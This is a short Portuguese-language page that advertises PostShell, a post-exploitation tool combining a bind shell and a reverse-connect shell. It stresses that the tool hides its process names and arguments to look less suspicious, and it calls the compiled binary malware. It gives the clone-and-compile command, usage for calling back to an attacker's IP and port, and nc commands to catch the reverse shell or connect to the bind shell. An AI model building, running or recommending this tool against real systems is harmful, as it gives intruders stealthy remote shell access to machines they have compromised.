
PostShell - Shell Bind/Backconnect de Pós-exploração
PostShell é um shell de pós-exploração que inclui tanto um shell bind quanto um shell de conexão reversa. Ele cria um TTY totalmente interativo que permite controle de jobs. O tamanho do stub é de cerca de 14kb e pode ser compilado em qualquer sistema Unix-like.
Banner e interação com o shell após uma conexão ser iniciada.
PostShell permite uma pós-exploração mais fácil, tornando o atacante menos dependente de dependências como Python e Perl. Ele também incorpora tanto um shell de conexão reversa quanto um shell bind, o que significa que, se um alvo não permitir conexões de saída, um operador pode simplesmente iniciar um shell bind e conectar-se à máquina remotamente. PostShell também é significativamente menos suspeito do que um shell tradicional, pois tanto o nome dos processos quanto os argumentos são ocultados.
git clone https://github.com/rek7/postshellcd postshell && sh compile.sh
Isso deve criar um binário chamado "stub" que é o malware.$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$
Backconnect:
$ ./stub 127.0.0.1 13377
Bind Shell:
$ ./stub 13377
Recebendo uma conexão reversa:
$ nc -vlp port
Conectando a um shell bind:
$ nc host port